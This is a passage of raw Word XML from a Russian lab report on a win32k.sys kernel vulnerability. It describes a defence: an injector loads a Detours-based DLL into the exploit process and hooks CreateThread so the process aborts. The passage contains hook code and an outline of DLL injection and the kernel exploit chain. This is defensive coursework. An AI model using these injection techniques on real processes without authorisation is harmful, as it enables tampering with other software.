            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6923D96C" w14:textId="6CA2E347" w:rsidR="000A4A35" w:rsidRDefault="00ED4A4A" w:rsidP="00683145">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00A10EA5">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r w:rsidR="00CE67BD">
        <w:t>Переписывание кода функции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9873E2" w14:textId="44EFC1FB" w:rsidR="008E5E75" w:rsidRDefault="00CE67BD" w:rsidP="008E5E75">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE67BD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CF18E67" wp14:editId="1DD4CC94">
            <wp:extent cx="5940425" cy="386143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861435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48494E6F" w14:textId="7ADCC930" w:rsidR="005A5E62" w:rsidRDefault="008E5E75" w:rsidP="00887A95">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00A10EA5">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ― </w:t>
      </w:r>
      <w:r w:rsidR="00CE67BD">
        <w:t>Добавление новых блоков</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031F30CD" w14:textId="22B8C884" w:rsidR="00235DF6" w:rsidRDefault="00235DF6" w:rsidP="00235DF6">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Реализация доп задания</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F12B39" w14:textId="514141B1" w:rsidR="00235DF6" w:rsidRDefault="00235DF6" w:rsidP="00235DF6">
      <w:r>
        <w:t xml:space="preserve">В качестве дополнительного задания требуется разработать средство защиты рассматриваемой уязвимости. Итак, имеется два уязвимых участка кода в реализации </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r w:rsidRPr="00235DF6">
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidRPr="00235DF6">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sys</w:t>
      </w:r>
      <w:r w:rsidRPr="00235DF6">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Причем, первый участок </w:t>
      </w:r>
      <w:r w:rsidR="00126E90">
        <w:t xml:space="preserve">под воздействием первого эксплойта может вызвать компрометацию информации и памяти ядра. Второй уязвимый участок поддается эксплуатации только в совокупности с первым: сначала необходимо забраться в область памяти ядра, а потом вызовом второго эксплойта добиться </w:t>
      </w:r>
      <w:r w:rsidR="00126E90">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidR="00126E90" w:rsidRPr="00126E90">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00126E90">
        <w:t xml:space="preserve"> Таким образом, «обезвре</w:t>
      </w:r>
      <w:r w:rsidR="004E062D">
        <w:t>живанием</w:t>
      </w:r>
      <w:r w:rsidR="00126E90">
        <w:t>» перв</w:t>
      </w:r>
      <w:r w:rsidR="004E062D">
        <w:t>ого</w:t>
      </w:r>
      <w:r w:rsidR="00126E90">
        <w:t xml:space="preserve"> эксплойт</w:t>
      </w:r>
      <w:r w:rsidR="004E062D">
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidR="00126E90">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E062D">
        <w:t>можно обезвредить и второй.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650712C7" w14:textId="08308CAE" w:rsidR="00D0340C" w:rsidRDefault="004E062D" w:rsidP="00235DF6">
      <w:r>
        <w:t>Требуется понять, как</w:t>
      </w:r>
      <w:r w:rsidR="000D1373">
        <w:t>ие действия вызывают крах системы и заблокировать их. Как описывалось выше, получение доступа к памяти ядра возможно благодаря обращении к структуре BITMAPINFOHEADER, а точнее к ее полю .biSize.</w:t>
      </w:r>
      <w:r w:rsidR="000417B1">
        <w:t xml:space="preserve"> Обращение происходит во втором потоке. Можно с помощью</w:t>
      </w:r>
      <w:r w:rsidR="0093523E">
        <w:t xml:space="preserve"> техники</w:t>
      </w:r>
      <w:r w:rsidR="000417B1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000417B1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hook</w:t>
      </w:r>
      <w:r w:rsidR="000417B1" w:rsidRPr="0093523E">
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidR="000417B1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inject</w:t>
      </w:r>
      <w:r w:rsidR="000417B1" w:rsidRPr="0093523E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000417B1">
        <w:t xml:space="preserve">заблокировать вызов </w:t>
      </w:r>
      <w:r w:rsidR="000417B1" w:rsidRPr="000417B1">
        <w:t>функции CreateThread.</w:t>
      </w:r>
      <w:r w:rsidR="00835FC9">
        <w:t xml:space="preserve"> Под блокировкой понимается перехват функции и аварийное завершение.</w:t>
      </w:r>
      <w:r w:rsidR="00D0340C">
        <w:t xml:space="preserve"> Если функция не будет выполнена, то вся программа эксплойта должна упасть.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499193DA" w14:textId="7DCE5EE1" w:rsidR="00173F59" w:rsidRDefault="00173F59" w:rsidP="00235DF6">
      <w:r>
        <w:t xml:space="preserve">Для реализации данной техники потребовалось использовать библиотеку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Detours</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Данная библиотека разработана корпорацией </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="00173F59">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и отлично подходит для реализации техники перехвата и инжектинга на целевой ОС </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00173F59">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Был реализован проект, состоящий из двух частей: приложения, совершающего инъекцию, и подгружаемой к процессу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r>
        <w:t>. Коды будут представлены в Приложениях 3 и 4 соответственно. Разберём для начала инжектор.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711ACDC1" w14:textId="01BC5625" w:rsidR="00173F59" w:rsidRPr="00C839CA" w:rsidRDefault="00173F59" w:rsidP="00235DF6">
      <w:r>
        <w:t>С помощью</w:t>
      </w:r>
      <w:r w:rsidRPr="00173F59">
        <w:t xml:space="preserve"> CreateToolhelp32Snapshot</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> производится</w:t>
      </w:r>
      <w:r w:rsidR="001C0CFB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">снепшот всех процессов в системе и далее </w:t>
      </w:r>
      <w:r w:rsidR="001C0CFB">
        <w:t xml:space="preserve">ищется имя указанного процесса (предполагаем, что имя эксплойта известно). Поиск осуществляется в бесконечном цикле, так что </w:t>
      </w:r>
      <w:r w:rsidR="00C839CA">
        <w:t>инжектор, по сути,</w:t>
      </w:r>
      <w:r w:rsidR="001C0CFB">
        <w:t xml:space="preserve"> ждет, когда процесс будет запущен, постоянно обновляя список процессов.</w:t>
      </w:r>
      <w:r w:rsidR="00C839CA">
        <w:t xml:space="preserve"> Далее к найденному процессу подгружается </w:t>
      </w:r>
      <w:r w:rsidR="00C839CA">
        <w:lastRenderedPageBreak/>
        <w:t>библиотека, совершающая перехват.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C839CA">
        <w:t>Схема подгрузки представлена на Рисунке 8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3A135B" w14:textId="57194F9F" w:rsidR="00C839CA" w:rsidRDefault="00C839CA" w:rsidP="00C839CA">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EDDD2E9" wp14:editId="2DCAC5F7">
            <wp:extent cx="5814060" cy="18104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6675" cy="1814406"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01107E20" w14:textId="7DBEE49E" w:rsidR="00C839CA" w:rsidRDefault="00C839CA" w:rsidP="00C839CA">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 8 — Подгрузка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F557A56" w14:textId="1ABB4383" w:rsidR="00C839CA" w:rsidRPr="001E125A" w:rsidRDefault="00C839CA" w:rsidP="00C839CA">
      <w:r>
        <w:t>Теперь рассмотрим алгоритм работы самой библиотеки.</w:t>
      </w:r>
      <w:r w:rsidR="001E125A">
        <w:t xml:space="preserve"> Ниже представлен код с комментариями, описывающими, как именно происходит инъекция в процесс. Для подмены вызова требуются указатели на оригинальную и подменяемую функции. В</w:t>
      </w:r>
      <w:r w:rsidR="001E125A" w:rsidRPr="001E125A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E125A">
        <w:t>подменяемой</w:t>
      </w:r>
      <w:r w:rsidR="001E125A" w:rsidRPr="001E125A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E125A">
        <w:t>функции</w:t>
      </w:r>
      <w:r w:rsidR="001E125A" w:rsidRPr="001E125A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E125A">
        <w:t>вместо</w:t>
      </w:r>
      <w:r w:rsidR="001E125A" w:rsidRPr="001E125A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E125A">
        <w:t xml:space="preserve">всех действий просто выполняется </w:t>
      </w:r>
      <w:r w:rsidR="001E125A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>abort</w:t>
      </w:r>
      <w:r w:rsidR="001E125A" w:rsidRPr="001E125A">
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="001E125A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE3BBFC" w14:textId="60D9D038" w:rsidR="001E125A" w:rsidRPr="001E125A" w:rsidRDefault="001E125A" w:rsidP="001E125A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ul</w:t>
      </w:r>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reason</w:t>
      </w:r>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> == </w:t>
      </w:r>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PROCESS</w:t>
      </w:r>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ATTACH</w:t>
      </w:r>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0873BFA6" w14:textId="1F15DCB9" w:rsidR="001E125A" w:rsidRDefault="001E125A" w:rsidP="001E125A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">DetourTransactionBegin(); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// вызывается перед установкой/снятием хука</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8BF07C" w14:textId="24C159A9" w:rsidR="001E125A" w:rsidRDefault="001E125A" w:rsidP="001E12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 xml:space="preserve">DetourUpdateThread(GetCurrentThread()); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// инициализирует установку/снятие хука для указанного потока</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2295B332" w14:textId="28996191" w:rsidR="001E125A" w:rsidRDefault="001E125A" w:rsidP="001E12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t>DetourAttach(&amp;(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PVOID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;)pCreateThread, HookCreateThread); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// выполняет подмену заданного вызова</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64083916" w14:textId="1F40C1DB" w:rsidR="001E125A" w:rsidRDefault="001E125A" w:rsidP="001E12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LONG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> err = DetourTransactionCommit(); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// После выполнения подмены нужно завершить транзакцию вызовом функции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A82FC7A" w14:textId="1259C1A8" w:rsidR="001E125A" w:rsidRPr="001E125A" w:rsidRDefault="001E125A" w:rsidP="001E125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sidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (err != </w:t>
      </w:r>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NO_ERROR</w:t>
      </w:r>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1C94FB" w14:textId="18670E5E" w:rsidR="001E125A" w:rsidRPr="005F0474" w:rsidRDefault="001E125A" w:rsidP="001E125A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001E125A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0474">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> -1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298C5806" w14:textId="449EF8CD" w:rsidR="001E125A" w:rsidRDefault="001E125A" w:rsidP="001E125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38612FC4" w14:textId="34C4270F" w:rsidR="001E125A" w:rsidRDefault="00E865C1" w:rsidP="00C839CA">
      <w:r>
        <w:t xml:space="preserve">Теперь протестируем разработанное решение. </w:t>
      </w:r>
      <w:r w:rsidR="00C840CE">
        <w:t xml:space="preserve">Запускаем инжектор, затем экплойт. Процесс инжектора должен сразу завершиться, поскольку хук уже совершен. Проверим наличие инъекции с помощью утилиты </w:t>
      </w:r>
      <w:r w:rsidR="00C840CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ProcessHacker</w:t>
      </w:r>
      <w:r w:rsidR="00C840CE">
        <w:t xml:space="preserve"> (Рисунок 9). На Рисунке 10 результат запуска эксплойта. Как видно, он завершается аварийно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC7FB82" w14:textId="039E90E2" w:rsidR="00C840CE" w:rsidRDefault="00C840CE" w:rsidP="00C840CE">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="00C840CE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5633AB87" wp14:editId="7DB4293A">
            <wp:extent cx="3813734" cy="46710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16168" cy="4674042"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7528D67C" w14:textId="0FC3C0BF" w:rsidR="00C840CE" w:rsidRDefault="00C840CE" w:rsidP="00C840CE">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 9 — Реализация инъекции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C60945" w14:textId="7B364059" w:rsidR="00EB5249" w:rsidRDefault="00EB5249" w:rsidP="00EB5249">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB5249">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68BE2A60" wp14:editId="74E7C9D1">
            <wp:extent cx="5940425" cy="3112770"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Рисунок 5" descr="Изображение выглядит как текст,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снимок экрана, монитор&#10;&#10;Автоматически созданное описание"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="3112770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
